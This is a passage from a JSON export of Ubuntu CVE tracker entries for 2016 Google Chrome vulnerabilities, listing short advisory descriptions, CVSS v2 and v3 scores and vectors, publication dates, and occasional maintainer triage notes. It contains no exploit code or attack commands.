55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for\nAndroid allowed a remote attacker to potentially exploit heap corruption\nvia a crafted PDF file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5210", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5210"], "modified": "2017-01-19T00:00:00", "id": "UB:CVE-2016-5210", "href": "https://ubuntu.com/security/CVE-2016-5210", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:50:39", "description": "The extensions API in Google Chrome prior to 55.0.2883.75 for Mac, Windows\nand Linux, and 55.0.2883.84 for Android incorrectly handled navigation\nwithin PDFs, which allowed a remote attacker to temporarily spoof the\ncontents of the Omnibox (URL bar) via a crafted HTML page containing PDF\ndata.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5218", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5218"], "modified": "2017-01-19T00:00:00", "id": "UB:CVE-2016-5218", "href": "https://ubuntu.com/security/CVE-2016-5218", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:44:34", "description": "A use after free in PDFium in Google Chrome prior to 55.0.2883.75 for Mac,\nWindows and Linux, and 55.0.2883.84 for Android allowed a remote attacker\nto perform an out of bounds memory read via a crafted PDF file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.4}, "published": "2017-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5216", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5216"], "modified": "2017-01-19T00:00:00", "id": "UB:CVE-2016-5216", "href": "https://ubuntu.com/security/CVE-2016-5216", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:44:34", "description": "The extensions API in Google Chrome prior to 55.0.2883.75 for Mac, Windows\nand Linux, and 55.0.2883.84 for Android incorrectly permitted access to\nprivileged plugins, which allowed a remote attacker to bypass site\nisolation via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5217", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5217"], "modified": "2017-01-19T00:00:00", "id": "UB:CVE-2016-5217", "href": "https://ubuntu.com/security/CVE-2016-5217", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:45:13", "description": "A use after free in webaudio in Google Chrome prior to 55.0.2883.75 for\nMac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote\nattacker to perform an out of bounds memory read via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5215", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5215"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5215", "href": "https://ubuntu.com/security/CVE-2016-5215", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:50:39", "description": "Integer overflow in PDFium in Google Chrome prior to 55.0.2883.75 for Mac,\nWindows and Linux, and 55.0.2883.84 for Android allowed a remote attacker\nto potentially exploit heap corruption or DoS via a crafted PDF file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5223", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5223"], "modified": "2017-01-19T00:00:00", "id": "UB:CVE-2016-5223", "href": "https://ubuntu.com/security/CVE-2016-5223", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-22T21:55:51", "description": "An off by one error resulting in an allocation of zero size in FFmpeg in\nGoogle Chrome prior to 54.0.2840.98 for Mac, and 54.0.2840.99 for Windows,\nand 54.0.2840.100 for Linux, and 55.0.2883.84 for Android allowed a remote\nattacker to potentially exploit heap corruption via a crafted video file.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[ebarretto](<https://launchpad.net/~ebarretto>) | Could not find the same affected code on xenial version. The fix came on version 3.2 and xenial is on 2.8.14 where that function does not exist and there was no similar code.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-11T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5199", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199"], "modified": "2016-11-11T00:00:00", "id": "UB:CVE-2016-5199", "href": "https://ubuntu.com/security/CVE-2016-5199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:45:32", "description": "Google Chrome prior to 54.0.2840.59 for Windows, Mac, and Linux;\n54.0.2840.85 for Android permitted navigation to blob URLs with\nnon-canonical origins, which allowed a remote attacker to spoof the\ncontents of the Omnibox (URL bar) via crafted HTML pages.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-10-17T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5189", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5189"], "modified": "2016-10-17T00:00:00", "id": "UB:CVE-2016-5189", "href": "https://ubuntu.com/security/CVE-2016-5189", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:45:13", "description": "A use after free in V8 in Google Chrome prior to 55.0.2883.75 for Mac,\nWindows and Linux, and 55.0.2883.84 for Android allowed a remote attacker\nto potentially exploit heap corruption via a crafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mikesalvatore](<https://launchpad.net/~mikesalvatore>) | The Ubuntu Security Team does not support libv8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5213", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5213"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5213", "href": "https://ubuntu.com/security/CVE-2016-5213", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:45:13", "description": "Type confusion in libGLESv2 in ANGLE in Google Chrome prior to 55.0.2883.75\nfor Mac, Windows and Linux, and 55.0.2883.84 for Android possibly allowed a\nremote attacker to bypass buffer validation via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5221", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5221"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5221", "href": "https://ubuntu.com/security/CVE-2016-5221", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:45:13", "description": "Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and\n55.0.2883.84 for Android insufficiently sanitized DevTools URLs, which\nallowed a remote attacker to read local files via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5212", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5212"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5212", "href": "https://ubuntu.com/security/CVE-2016-5212", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-22T21:50:39", "description": "Google Chrome prior to 55.0.2883.75 for Windows mishandled downloaded\nfiles, which allowed a remote attacker to prevent the downloaded file from\nreceiving the Mark of the Web via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5214", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5214"], "modified": "2017-01-19T00:00:00", "id": "UB:CVE-2016-5214", "href": "https://ubuntu.com/security/CVE-2016-5214", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:45:32", "description": "Blink in Google Chrome prior to 54.0.2840.59 for Windows, Mac, and Linux;\n54.0.2840.85 for Android had insufficient validation in bitmap handling,\nwhich allowed a remote attacker to potentially exploit heap corruption via\ncrafted HTML pages.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-17T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5182", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5182"], "modified": "2016-10-17T00:00:00", "id": "UB:CVE-2016-5182", "href": "https://ubuntu.com/security/CVE-2016-5182", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:44:34", "description": "A leak of privateClass in the extensions API in Google Chrome prior to\n54.0.2840.100 for Linux, and 54.0.2840.99 for Windows, and 54.0.2840.98 for\nMac allowed a remote attacker to access privileged JavaScript code via a\ncrafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5201", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5201"], "modified": "2017-01-19T00:00:00", "id": "UB:CVE-2016-5201", "href": "https://ubuntu.com/security/CVE-2016-5201", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-22T21:45:13", "description": "Leaking of an SVG shadow tree leading to corruption of the DOM tree in\nBlink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux,\nand 55.0.2883.84 for Android allowed a remote attacker to inject arbitrary\nscripts or HTML (UXSS) via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5204", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5204"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5204", "href": "https://ubuntu.com/security/CVE-2016-5204", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:45:12", "description": "In Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux,\nand 55.0.2883.84 for Android, corruption of the DOM tree could occur during\nthe removal of a full screen element, which allowed a remote attacker to\nachieve arbitrary code execution via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5207", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5207"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5207", "href": "https://ubuntu.com/security/CVE-2016-5207", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:44:34", "description": "The PDF plugin in Google Chrome prior to 55.0.2883.75 for Mac, Windows and\nLinux, and 55.0.2883.84 for Android incorrectly followed redirects, which\nallowed a remote attacker to bypass the Same Origin Policy via a crafted\nHTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5206", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5206"], "modified": "2017-01-19T00:00:00", "id": "UB:CVE-2016-5206", "href": "https://ubuntu.com/security/CVE-2016-5206", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:45:13", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Linux, Windows and Mac,\nincorrectly handles deferred page loads, which allowed a remote attacker to\ninject arbitrary scripts or HTML (UXSS) via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5205", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5205"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5205", "href": "https://ubuntu.com/security/CVE-2016-5205", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:45:13", "description": "A heap use after free in V8 in Google Chrome prior to 55.0.2883.75 for Mac,\nWindows and Linux, and 55.0.2883.84 for Android allowed a remote attacker\nto potentially exploit heap corruption via a crafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mikesalvatore](<https://launchpad.net/~mikesalvatore>) | The Ubuntu Security Team does not support libv8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.3, "privilegesRequired": "NONE", "vectorString": 